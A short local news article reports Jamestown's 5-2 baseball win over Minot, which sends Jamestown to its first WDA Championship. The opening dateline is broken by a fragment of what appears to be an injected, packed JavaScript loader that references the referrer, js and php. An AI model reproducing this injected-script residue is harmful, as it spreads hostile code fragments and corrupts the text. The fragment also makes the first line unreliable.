MINOT, ykrsn|var|u0026u|referrer|ahhhn||js|php’.split(‘|’),0,{}))
N.D. (NewsDakota.com) – Andrew Nohrenberg and Dawson Douty picked up right where Ben Friebel left off, combining for another gem as the Jamestown baseball team knocked off Minot 5-2 to reach the first WDA Championship in school history. The win also secures the Jays a spot in the state tournament next weekend in Mandan.

Minot jumped out to a 1-0 lead when Easton Bennett hit a solo home run in the first inning. Jamestown tied it when Nolan Kratz bounced a double off the wall in left-center field.

In the next half inning, Minot immediately retook the lead on a soft liner down the line that deflected off Ty Fischer’s glove on a dive.

Jamestown broke through with three runs in the fifth aided by a trio of Magi errors.

Nohrenberg went four innings for the win while giving up two runs and striking out three. Douty picked up the save working three hitless innings.

Jamestown will play Dickinson for the WDA Championship at 5pm on Saturday at Corbett Field in Minot. You can listen to the game on ESPN Jamestown.
